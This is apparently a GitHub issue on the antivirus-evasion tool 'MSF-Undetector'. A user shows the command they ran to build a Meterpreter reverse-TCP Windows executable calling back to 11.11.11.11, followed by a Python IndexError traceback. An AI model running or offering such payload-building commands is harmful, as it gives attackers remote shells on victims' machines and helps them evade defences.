MSF-Undetector icon indicating copy to clipboard operation
MSF-Undetector copied to clipboard

IndexError: list index out of range

Open DiamondLink opened this issue 3 years ago • 0 comments

Here is the input:

python msfud.py -p windows/meterpreter/reverse_tcp -a 11.11.11.11 -l 4444 -o msfudd.exe

And here is the output :

[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload [-] No arch selected, selecting arch: x86 from the payload No encoder specified, outputting raw payload Payload size: 354 bytes

Traceback (most recent call last): File "msfud.py", line 20, in <module> firstbase64 = re.findall(r"'(.*?)'", tmp, re.DOTALL)[1] IndexError: list index out of range

DiamondLink avatar Feb 10 '21 20:02 DiamondLink